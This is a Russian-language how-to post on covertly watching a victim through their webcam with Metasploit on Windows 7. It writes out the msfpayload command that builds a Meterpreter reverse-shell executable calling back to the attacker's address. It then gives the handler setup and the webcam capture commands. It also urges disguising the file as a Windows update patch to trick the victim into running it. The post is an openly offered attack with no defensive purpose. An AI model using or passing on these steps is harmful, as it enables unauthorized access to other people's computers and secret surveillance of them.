Подсматриваем через чужую web-камеру - Metasploit в помощь.

Этот способ работает на виндовс 7. Воспользуемся одной из давно найденных, но до сих пор работающих уязвимостей для Windows 7, которая затрагивает UAC (User Account Control).

Для начала создаётся вредоносный исполняемый файл run_me.exe, который создаётся командой:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe

LHOST=192.168.1.5 – IP-адрес атакующего
    LPORT=4444 – порт атакующего

Запускаем Metasploit:

 msfconsole


Уже и зловредный экзешник создался на рабочем столе, который нужно впарить жертве под видом чего угодно. Например, под видом патча, шоп якобы винда 7, не обновлялась до 10, которая навела много шухера.))) Файло-вырь, тока не забыть переназвать под шо нить подходящее.


Далее, такие команды:

 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set lhost 192.168.1.5
 exploit

Так называемая "панель управления", ждёт, кахда жертва запустит выря и он с ней сконектится сам.

Главное, шоп айпишнег у атакующего не сменился, вырь не будет знать, кого искать.

После того, когда жертва запустит файл run_me.exe, получаем контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но в данном примере, нужно подсмотреть за пользователем. Далее, опишу на словах, без скринов, ввиду того, что Метасплойт ждёт отзыва и коннекта от жертвы.

Надо сначала посмотреть, есть ли вообще у жертвы web-ка, такой командой:

meterpreter > webcam_list

Выведет, к примеру, вот такое. Или другое название вебки.
 1: Logitech Webcam 120

Будет означать, что имееется вебка Logitech Webcam 120.

Снимок делается командой:

meterpreter > webcam_snap

Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой:

meterpreter > run webcam -p /var/www

После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите:

/var/www/webcam.html